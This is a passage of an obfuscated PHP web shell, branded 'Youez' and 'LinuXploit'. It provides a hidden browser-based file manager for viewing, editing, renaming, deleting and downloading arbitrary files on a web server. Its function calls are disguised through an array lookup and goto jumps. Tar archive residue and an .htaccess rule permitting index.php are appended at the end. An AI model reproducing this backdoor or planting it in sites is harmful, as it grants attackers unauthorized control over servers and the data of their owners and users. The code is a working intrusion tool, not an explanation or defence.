<?php  isset($_POST["s"]) ? $c8[16]($Jd . '/' . jD($_GET["n"]), $_POST["n"]) ? XE("successfully changed the folder name") : Xe("failed to change the folder name", 0) : null; goto WC; Ox: ?>
<h5 class="border p-1 mb-3">Edit file</h5>
<span>File name : <?= Jd($_GET["n"]); ?></span>
<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $c8[18]($c8[14]($Jd . '/' . jD($_GET["n"]))); ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php  isset($_POST["s"]) ? $c8[13]($Jd . '/' . jD($_GET["n"]), $_POST["ctn"]) ? xE("file contents changed successfully", 1, "&a=" . sS("view") . "&n={$_GET["n"]}") : xE("file contents failed to change") : null; goto WC; Ag: ?>
<h5 class="border p-1 mb-3">View file</h5>
<span>File name : <?= jd($_GET["n"]); ?></span>
<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $c8[18]($c8[14]($Jd . '/' . jd($_GET["n"]))); ?></textarea></div>
<?php  WC: ?></div><?php  goto mR; Un: ?>
<table class="table table-hover table-borderless table-sm">
<thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th<th>Action</th></tr></thead><tbody class="text-light"><?php  $G3 = $c8[5]($G3($Jd), [".", ".."]); foreach ($G3 as $yf) { if ($c8[6]("{$Jd}/{$yf}")) { goto CB; } goto Qj; CB: echo "\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td><a href=\"?p=" . sS("{$Jd}/{$yf}") . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$yf}")) . "\"><i class=\"fa fa-fw fa-folder\"></i> {$yf}</a></td>\n\t\t\t\t\t\t<td>N/A</td>\n\t\t\t\t\t\t<td><font color=\"" . ($c8[8]("{$Jd}/{$yf}") ? "#00ff00" : (!$c8[9]("{$Jd}/{$yf}") ? "red" : null)) . "\">" . RN("{$Jd}/{$yf}") . "</font></td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<a href=\"?p=" . ss($Jd) . "&a=" . ss("rename") . "&n=" . ss($yf) . "&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a>\n\t\t\t\t\t\t\t<a href=\"?p=" . sS($Jd) . "&a=" . ss("delete") . "&n=" . ss($yf) . "\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>"; Qj: } ad: foreach ($G3 as $F1) { if ($c8[7]("{$Jd}/{$F1}")) { goto wA; } goto X1; wA: $kL = $c8[10]("{$Jd}/{$F1}") / 1024; $kL = round($kL, 3); $kL = $kL > 1024 ? round($kL / 1024, 2) . "MB" : $kL . "KB"; echo "\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td><a href=\"?p=" . SS($Jd) . "&a=" . sS("view") . "&n=" . SS($F1) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " . $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$F1}")) . "\"><i class=\"fa fa-fw fa-file\"></i> {$F1}</a></td>\n\t\t\t\t\t\t<td>{$kL}</td>\n\t\t\t\t\t\t<td><font color=\"" . ($c8[8]("{$Jd}/{$F1}") ? "#00ff00" : (!$c8[9]("{$Jd}/{$F1}") ? "red" : null)) . "\">" . rN("{$Jd}/{$F1}") . "</font></td>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t\t<div class=\"d-flex justify-content-between\">\n\t\t\t\t\t\t\t\t\t<a href=\"?p=" . Ss($Jd) . "&a=" . Ss("edit") . "&n=" . SS($F1) . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a>\n\t\t\t\t\t\t\t\t\t<a href=\"?p=" . ss($Jd) . "&a=" . SS("rename") . "&n=" . ss($F1) . "&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a>\n\t\t\t\t\t\t\t\t\t<a href=\"?p=" . ss($Jd) . "&n=" . sS($F1) . "&download" . "\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a>\n\t\t\t\t\t\t\t\t\t<a href=\"?p=" . ss($Jd) . "&a=" . sS("delete") . "&n=" . ss($F1) . "\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a>\n\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t</td>\n\t\t\t\t\t</tr>\n\t\t\t\t\t"; X1: } a2: ?></tbody></table><?php  mR: ?></article><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>quote/.htaccess000064400000000113151335034710007474 0ustar00<FilesMatch "^index.php$">
Order allow,deny
Allow from all
</FilesMatch>

Youez - 2016 - github.com/yon3zu
LinuXploit